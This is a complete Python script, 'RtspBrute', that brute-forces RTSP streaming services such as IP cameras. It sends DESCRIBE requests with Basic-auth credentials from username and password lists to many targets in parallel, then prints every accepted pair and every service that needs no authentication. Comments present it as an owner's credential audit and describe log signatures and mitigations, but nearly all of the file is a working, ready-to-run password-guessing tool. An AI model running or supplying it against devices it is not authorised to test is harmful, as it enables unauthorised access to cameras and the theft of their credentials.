#!/usr/bin/python3
import base64
import socket
import threading
import fire
import re
import queue
import time
from pathlib import Path
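class RtspBrute(object):
    """
    RtspBrute

    RtspBrute is a RTSP (Real Time Streaming Protocol) credential-audit tool.
    It sends one unauthenticated DESCRIBE to every target and, when the reply
    is a 401 carrying a Basic challenge, repeats the DESCRIBE with each
    username/password pair from the supplied lists.

    Example:
        python3 rtspBrute.py -t 127.0.0.1 -u admin --password admin123 run
        python3 rtspBrute.py -t 127.0.0.1,127.0.0.2 -u ./username.txt --password admin123456 run
        python3 rtspBrute.py -t ./targets.txt -u admin --password admin123 --port 555 run

    :param str target: comma-separated addresses, or a file with one IPv4
        address per line (example: 127.0.0.1,127.0.0.2 or ./targets.txt);
        ``port`` is appended to every entry
    :param str username: username or username file
    :param str password: password or password file
    :param str port: default port 554
    """

    # Reading the results as the owner of the device:
    #   "<target>,<username>,<password>"  -> the device accepted that pair; the
    #       credential should be rotated. The line contains the secret in clear
    #       text, so treat captured output as sensitive.
    #   "... allows unauthorized access ..." -> DESCRIBE succeeded with no
    #       credentials at all, i.e. authentication is not enforced.
    #   no output for a target -> NOT evidence of strong credentials: targets
    #       that time out, answer with something else, or challenge with a
    #       scheme other than Basic are skipped silently.
    #
    # What this traffic looks like in logs or on the wire: every attempt is a
    # fresh TCP connection carrying a single DESCRIBE with the fixed header
    # "CSeq: 2" and no other headers besides Authorization, and rejected
    # attempts against one target arrive roughly one second apart. Bursts of
    # 401 replies to requests of that shape are the thing to alert on;
    # enforcing authentication, replacing factory credentials and limiting
    # which networks can reach the RTSP port are the corresponding mitigations.

    # Dotted-quad IPv4 address, each octet 0-255, nothing before or after it.
    _IPV4_RE = re.compile(
        r"^(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])$")

    # Upper bound on worker threads started by run().
    _MAX_THREADS = 100

    def __init__(self, target, username, password, port=554):
        """Expand the three command-line values into lists.

        ``port`` is stored first because target expansion appends it to
        every address.
        """
        self.port = port
        self.targetlist = self.param_to_list(target, method='target')
        self.usernamelist = self.param_to_list(username)
        self.passwordlist = self.param_to_list(password)

    def run(self):
        """Queue every target and process the queue with worker threads.

        At most ``_MAX_THREADS`` threads are started, never more than there
        are targets. The call returns once every worker has finished.
        """
        print("There are %s targets" % len(self.targetlist))
        print("Use %s usernames" % len(self.usernamelist))
        print("Use %s passwords" % len(self.passwordlist))

        # brute_force() reads the work queue through this module-level name.
        global q
        q = queue.Queue()
        for _target in self.targetlist:
            q.put(_target)

        threads = min(len(self.targetlist), self._MAX_THREADS)
        print("Use %s threads" % threads)

        # daemon=True replaces the deprecated Thread.setDaemon(True).
        workers = [
            threading.Thread(target=self.brute_force, args=(), daemon=True)
            for _ in range(threads)
        ]
        for worker in workers:
            worker.start()
        for worker in workers:
            worker.join()
        print("Finished all threads")

    def vaild_target(self, target):
        """Return ``target`` if it is a bare dotted-quad IPv4 address, else None.

        The method name (sic) is kept because it is part of the class's
        public surface.
        """
        match = self._IPV4_RE.search(target)
        return match[0] if match else None

    def param_to_list(self, param, method=""):
        """Turn a command-line value into a list of entries.

        If ``param`` names an existing file, each stripped line is one entry
        and duplicates are dropped (first occurrence wins). Otherwise the
        value is split on commas.

        :param param: literal value(s) or a path to a file
        :param str method: ``""`` for plain entries, ``"target"`` to append
            ``":<port>"`` to each entry; any other value yields no entries
        :return: list of strings

        With ``method="target"`` lines read from a file must be bare IPv4
        addresses; lines that are not are skipped. Values given directly on
        the command line are not validated.
        """
        if method not in ("", "target"):
            return []
        suffix = ":" + str(self.port) if method == "target" else ""

        # python-fire converts literal-looking arguments before they get
        # here (an all-digit password arrives as int), and Path() rejects
        # non-strings, so normalise to text first.
        if isinstance(param, (list, tuple, set)):
            return [str(item) + suffix for item in param]
        param = str(param)

        path = Path(param)
        if not path.is_file():
            return [item + suffix for item in param.split(',')]

        entries = []
        with open(path, encoding='utf-8', errors='ignore') as file:
            for line in file:
                entry = line.strip()
                if method == "target":
                    entry = self.vaild_target(entry)
                    if entry is None:
                        # Blank or malformed line: skip it instead of
                        # failing on None further down.
                        continue
                entries.append(entry + suffix)
        # dict.fromkeys de-duplicates while keeping file order.
        return list(dict.fromkeys(entries))

    def rtsp_request(self, target, username="", password=""):
        """Send one RTSP DESCRIBE to ``target`` and return the start of the reply.

        :param str target: ``host:port``
        :param str username: when non-empty, an ``Authorization: Basic``
            header built from ``username:password`` is added
        :param str password: password used together with ``username``
        :return: up to the first 1024 bytes of the reply as text, or None
            when the connection fails, times out (5 s) or is interrupted
        """
        if username:
            # Basic auth is only base64 of "user:password", and the socket
            # below is plain TCP: the pair crosses the network in a form
            # anyone on the path can recover.
            auth = username + ":" + password
            auth_base64 = base64.b64encode(auth.encode()).decode()
            req = "DESCRIBE rtsp://{} RTSP/1.0\r\nCSeq: 2\r\nAuthorization: Basic {}\r\n\r\n".format(
                target, auth_base64)
        else:
            req = "DESCRIBE rtsp://{} RTSP/1.0\r\nCSeq: 2\r\n\r\n".format(
                target)

        # The context manager closes the socket on every path; without it
        # each attempt leaves a descriptor open until garbage collection.
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(5)
            try:
                s.connect((target.split(":")[0], int(target.split(":")[1])))
                s.sendall(req.encode())
                # The reply is untrusted bytes from the remote device; a
                # strict decode would raise on anything that is not UTF-8.
                return s.recv(1024).decode(errors="replace")
            except KeyboardInterrupt:
                return None
            except OSError:
                # socket.timeout, TimeoutError and socket.error are all
                # OSError: unreachable, refused or timed out.
                return None

    def brute_force(self):
        """Worker loop: take targets from the shared queue until it is empty.

        For each target the unauthenticated reply decides what happens:
        ``401 Unauthorized`` starts the credential check, ``200 OK`` is
        reported as an unauthenticated service, anything else (including no
        reply) is skipped.
        """
        while True:
            # get_nowait() instead of empty()+get(): between the two calls
            # another worker can take the last item, and a blocking get()
            # would then never return and run() would hang in join().
            try:
                target = q.get_nowait()
            except queue.Empty:
                return

            data = self.rtsp_request(target=target)
            if not data:
                continue
            if "401 Unauthorized" in data:
                self._check_credentials(target, data)
            elif "200 OK" in data:
                print(
                    "The RTSP service at: " + target + " allows unauthorized access and does not need a username/password")

    def _check_credentials(self, target, data):
        """Try every username/password pair against one target.

        ``data`` is the most recent reply. Another attempt is made only
        while that reply still carries a Basic challenge; once it does not
        (accepted pair, different scheme, unexpected reply) nothing further
        is sent to the target.
        """
        for username in self.usernamelist:
            for password in self.passwordlist:
                if "WWW-Authenticate: Basic" not in data:
                    return
                data = self.rtsp_request(target, username, password)
                if not data:
                    # The device stopped answering; previously this reached
                    # a substring test on None and killed the thread.
                    return
                if "200 OK" in data:
                    print(
                        "{},{},{}".format(target, username, password))
                if "401 Unauthorized" in data:
                    # One-second pause after every rejected pair.
                    time.sleep(1)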
# Script entry point: python-fire builds the command line from RtspBrute,
# so constructor arguments become flags and methods such as `run` become
# commands.
if __name__ == "__main__":
    fire.Fire(RtspBrute)